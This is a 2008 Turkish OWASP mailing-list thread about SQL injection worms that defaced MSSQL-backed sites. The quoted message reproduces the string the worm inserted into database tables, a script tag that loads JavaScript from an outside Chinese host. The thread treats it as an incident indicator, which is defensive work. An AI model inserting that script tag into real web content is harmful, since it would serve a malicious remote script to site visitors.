[Owasp-turkey] SQL Injection kullanan WORM'lar

Huzeyfe ONAL huzeyfe at lifeoverip.net
Mon May 12 06:18:53 EDT 2008


Selamlar,

benzer turde wormu -yontemi ayni, arac ve amaclar degisik- bir aydir 
farkli sekilde ben ilgiyle izliyorum*. Sadece MSSQL'i i ilgilendirse de 
Mysql kullanan sistemlerin loglarinda da denemeleri goruyoruz.


Aslinda bu son worm hadisesi  web tarafinin guvenligini -sayfa icerigi 
degistirilmedikce(deface)- cok dikkate  almayan sirket yoneticilerini 
biraz daha ikna etmis oldu.

*http://blog.lifeoverip.net/index.php/2008/04/30/son-gunlerin-seri-sql-injection-saldirilarina-dair/

Deniz CEVIK wrote:
> Selamalar,
> 
> Son iki haftadır 4-5 yerden siteleri değiştirildiğine dair şikayetler
> geldi. Sunucu loglarını detaylı incelediğimde aynı SQL injection
> pattern'i ile karşılaştık. SQL injectioni inceleyince tüm sistem
> tablolarına aşağıdaki gibi bir kayıtlar eklediği anlaşılıyor. Oldukça
> zararlı bir kod. Sql injection açığı bulunan sitelere banner ekleyerek
> para kazanmayı amaçlayan saldırılar ve çoğu çin kökenli.
> 
> </title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--
> 
> http://isc.incidents.org/diary.html?storyid=4393
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey


More information about the Owasp-turkey mailing list